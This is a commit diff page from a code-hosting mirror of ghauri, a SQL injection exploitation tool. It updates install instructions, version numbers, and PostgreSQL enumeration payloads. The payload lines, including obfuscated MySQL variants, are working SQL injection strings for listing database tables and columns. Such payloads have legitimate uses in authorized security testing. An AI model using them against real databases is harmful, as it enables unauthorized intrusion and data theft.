crash.software
Projects
Pull Requests
Issues
Builds
ghauri
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY ghauri Commits 9b11bf2d
🤬

  • updated code for postgresql sql queries, tried to fix issue with json parsing (still in testing phase), fixed multiple other issues..

  • Loading...
  • r0oth3x49 committed 2 years ago
    9b11bf2d
    1 parent d5f3c408
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    README.md
    skipped 17 lines
    18 18  ## ***Installation***
    19 19   
    20 20   - cd to **ghauri** directory.
    21  - - install requirements: `pip install --upgrade -r requirements.txt`
    22  - - run: `python setup.py install` or `python -m pip install -e .`
     21 + - install requirements: `python3 -m pip install --upgrade -r requirements.txt`
     22 + - run: `python3 setup.py install` or `python3 -m pip install -e .`
    23 23   - you will be able to access and run the ghauri with simple `ghauri --help` command.
    24 24   
    25 25  ## ***Download Ghauri***
    skipped 125 lines
  • ■ ■ ■ ■
    ghauri/__init__.py
    skipped 23 lines
    24 24   
    25 25  """
    26 26   
    27  -__version__ = "1.0.1#dev"
     27 +__version__ = "1.0.2"
    28 28  __author__ = "Nasir Khan (r0ot h3x49)"
    29 29  __license__ = "MIT"
    30 30  __copyright__ = "Copyright (c) 2016-2025 Nasir Khan (r0ot h3x49)"
    skipped 2 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/common/payloads.py
    skipped 1607 lines
    1608 1608   "(/*!SELECT*//**_**/COUNT(*)%23/**_**/%0AFROM%23/**_**/%0A(/*!INFORMATION_SCHEMA*/./**_**//*!TABLES*/)WHERE(TABLE_SCHEMA={db}))",
    1609 1609   ],
    1610 1610   "PostgreSQL": [
    1611  - "(SELECT COUNT(TABLENAME)::text+FROM pg_tables WHERE SCHEMANAME={db})",
    1612  - "(SELECT COUNT(TABLENAME)::text+FROM pg_tables WHERE SCHEMANAME+LIKE+'{db}')",
    1613  - "(SELECT COUNT(TABLENAME)::text+FROM pg_tables WHERE SCHEMANAME+IN+({db}))",
    1614  - "(SELECT COUNT(TABLE_NAME)::text+FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA IN({db}))",
    1615  - "(SELECT COUNT(TABLE_NAME)::text+FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA={db})",
    1616  - "(SELECT COUNT(TABLE_NAME)::text+FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE {db})",
     1611 + "(SELECT COUNT(TABLENAME)::text FROM pg_tables WHERE SCHEMANAME={db})",
     1612 + "(SELECT COUNT(TABLENAME)::text FROM pg_tables WHERE SCHEMANAME LIKE '{db}')",
     1613 + "(SELECT COUNT(TABLENAME)::text FROM pg_tables WHERE SCHEMANAME IN ({db}))",
     1614 + "(SELECT COUNT(TABLE_NAME)::text FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA IN({db}))",
     1615 + "(SELECT COUNT(TABLE_NAME)::text FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA={db})",
     1616 + "(SELECT COUNT(TABLE_NAME)::text FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE {db})",
    1617 1617   ],
    1618 1618   "Microsoft SQL Server": [
    1619 1619   "(SELECT LTRIM(STR(COUNT(name))) FROM {db}..sysobjects WHERE xtype IN (CHAR(117),CHAR(118)))",
    skipped 27 lines
    1647 1647   "(/*!SELECT*/ CONCAT_WS(0x09,/*!TABLE_NAME*/)FROM(/*!INFORMATION_SCHEMA*/./**_**//*!TABLES*/)/*!50000WHERE*/(TABLE_SCHEMA={db})LIMIT/**_**/0,1)",
    1648 1648   ],
    1649 1649   "PostgreSQL": [
    1650  - "(SELECT+TABLENAME::text+FROM pg_tables WHERE SCHEMANAME={db} OFFSET 0 LIMIT 1)",
    1651  - "(SELECT+TABLENAME::text+FROM pg_tables WHERE SCHEMANAME LIKE {db} OFFSET 0 LIMIT 1)",
    1652  - "(SELECT+TABLENAME::text+FROM pg_tables WHERE SCHEMANAME IN({db}) OFFSET 0 LIMIT 1)",
    1653  - "(SELECT TABLE_NAME::text+FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA={db} OFFSET 0 LIMIT 1)",
    1654  - "(SELECT TABLE_NAME::text+FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE {db} OFFSET 0 LIMIT 1)",
    1655  - "(SELECT TABLE_NAME::text+FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA IN({db}) OFFSET 0 LIMIT 1)",
     1650 + "(SELECT TABLENAME::text FROM pg_tables WHERE SCHEMANAME={db} OFFSET 0 LIMIT 1)",
     1651 + "(SELECT TABLENAME::text FROM pg_tables WHERE SCHEMANAME LIKE {db} OFFSET 0 LIMIT 1)",
     1652 + "(SELECT TABLENAME::text FROM pg_tables WHERE SCHEMANAME IN({db}) OFFSET 0 LIMIT 1)",
     1653 + "(SELECT TABLE_NAME::text FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA={db} OFFSET 0 LIMIT 1)",
     1654 + "(SELECT TABLE_NAME::text FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE {db} OFFSET 0 LIMIT 1)",
     1655 + "(SELECT TABLE_NAME::text FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA IN({db}) OFFSET 0 LIMIT 1)",
    1656 1656   ],
    1657 1657   "Microsoft SQL Server": [
    1658 1658   "(SELECT TOP 1 {db}..sysusers.name+CHAR(46)+{db}..sysobjects.name AS table_name FROM {db}..sysobjects INNER JOIN {db}..sysusers ON {db}..sysobjects.uid={db}..sysusers.uid WHERE {db}..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND {db}..sysusers.name+CHAR(46)+{db}..sysobjects.name NOT IN (SELECT TOP 0 {db}..sysusers.name+'.'+{db}..sysobjects.name AS table_name FROM {db}..sysobjects INNER JOIN {db}..sysusers ON {db}..sysobjects.uid={db}..sysusers.uid WHERE {db}..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY {db}..sysusers.name+'.'+{db}..sysobjects.name)ORDER BY {db}..sysusers.name+'.'+{db}..sysobjects.name)",
    skipped 24 lines
    1683 1683   "(/*!SELECT*//**_**/COUNT(*)%23/**_**/%0AFROM%23/**_**/%0A(/*!INFORMATION_SCHEMA*/./**_**//*!COLUMNS*/)WHERE(TABLE_SCHEMA={db})AND(/*!50000TABLE_NAME*/={tbl}))",
    1684 1684   ],
    1685 1685   "PostgreSQL": [
    1686  - "(SELECT COUNT(COLUMN_NAME)::text+FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA LIKE {db} AND TABLE_NAME LIKE {tbl})",
    1687  - "(SELECT COUNT(COLUMN_NAME)::text+FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA={db} AND TABLE_NAME={tbl})",
    1688  - "(SELECT COUNT(COLUMN_NAME)::text+FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA IN({db}) AND TABLE_NAME IN({tbl}))",
     1686 + "(SELECT COUNT(COLUMN_NAME)::text FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA LIKE {db} AND TABLE_NAME LIKE {tbl})",
     1687 + "(SELECT COUNT(COLUMN_NAME)::text FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA={db} AND TABLE_NAME={tbl})",
     1688 + "(SELECT COUNT(COLUMN_NAME)::text FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA IN({db}) AND TABLE_NAME IN({tbl}))",
    1689 1689   "(SELECT COUNT(*) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND nspname={db} AND a.relname={tbl})",
    1690 1690   ],
    1691 1691   "Microsoft SQL Server": [
    skipped 22 lines
    1714 1714   "(/*!SELECT*/ CONCAT_WS(0x09,/*!COLUMN_NAME*/)FROM(/*!INFORMATION_SCHEMA*/./**_**//*!COLUMNS*/)/*!50000WHERE*/(TABLE_SCHEMA={db})AND(/*!50000TABLE_NAME*/={tbl})LIMIT/**_**/0,1)",
    1715 1715   ],
    1716 1716   "PostgreSQL": [
    1717  - "(SELECT COLUMN_NAME::text+FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA LIKE {db} AND TABLE_NAME LIKE {tbl} OFFSET 0 LIMIT 1)",
    1718  - "(SELECT COLUMN_NAME::text+FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA={db} AND TABLE_NAME={tbl} OFFSET 0 LIMIT 1)",
    1719  - "(SELECT COLUMN_NAME::text+FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA IN({db}) AND TABLE_NAME IN({tbl}) OFFSET 0 LIMIT 1)",
    1720  - "(SELECT CONCAT(COLUMN_NAME)::text+FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA IN({db}) AND TABLE_NAME IN({tbl}) OFFSET 0 LIMIT 1)",
     1717 + "(SELECT COLUMN_NAME::text FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA LIKE {db} AND TABLE_NAME LIKE {tbl} OFFSET 0 LIMIT 1)",
     1718 + "(SELECT COLUMN_NAME::text FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA={db} AND TABLE_NAME={tbl} OFFSET 0 LIMIT 1)",
     1719 + "(SELECT COLUMN_NAME::text FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA IN({db}) AND TABLE_NAME IN({tbl}) OFFSET 0 LIMIT 1)",
     1720 + "(SELECT CONCAT(COLUMN_NAME)::text FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA IN({db}) AND TABLE_NAME IN({tbl}) OFFSET 0 LIMIT 1)",
    1721 1721   "(SELECT attname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND nspname={db} AND a.relname={tbl} OFFSET 0 LIMIT 1)",
    1722 1722   ],
    1723 1723   "Microsoft SQL Server": [
    skipped 61 lines
  • ■ ■ ■ ■ ■
    ghauri/core/extract.py
    skipped 271 lines
    272 272   f"error {error}, during operator check phase. Ghauri is going to retry"
    273 273   )
    274 274   retry_on_error += 1
    275  - logger.debug(_temp)
    276 275   if _temp.ok:
    277 276   if _temp.msg:
    278 277   logger.warning(_temp.msg)
    skipped 1424 lines
  • ■ ■ ■ ■ ■ ■
    setup.py
    skipped 4 lines
    5 5   
    6 6  setup(
    7 7   name="ghauri",
    8  - version="1.0.1#dev",
     8 + version="1.0.2",
    9 9   description="An advanced SQL injection detection & exploitation tool.",
    10 10   classifiers=["Programming Language :: Python3"],
    11 11   author="Nasir Khan",
    skipped 22 lines
    34 34   "error-based",
    35 35   "stacked-queries",
    36 36   ],
    37  - python_requires=">=3.7",
     37 + python_requires=">=3.8",
    38 38  )
    39 39   
Please wait...
Page is in error, reload to recover